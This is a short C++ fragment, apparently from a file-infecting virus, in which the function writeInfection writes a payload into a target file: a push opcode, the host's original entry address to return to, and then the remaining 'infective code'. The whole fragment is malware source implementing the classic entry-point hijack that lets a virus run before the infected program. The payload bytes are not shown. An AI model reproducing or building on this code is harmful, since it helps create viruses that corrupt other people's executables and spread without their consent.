void Target::writeInfection()
{
  enum { CODE_SIZE = sizeof(infection) - 1 };
  fprintf(stderr, "wrote %u bytes, ", CODE_SIZE);

  /* first byte is the opcode for "push" */
  write(fd_dst, infection, 1);

  /* next four bytes is the address to "ret" to */
  write(fd_dst, &original_entry, sizeof(original_entry));

  /* rest of infective code */
  write(fd_dst, infection + 5, CODE_SIZE - 5);
}
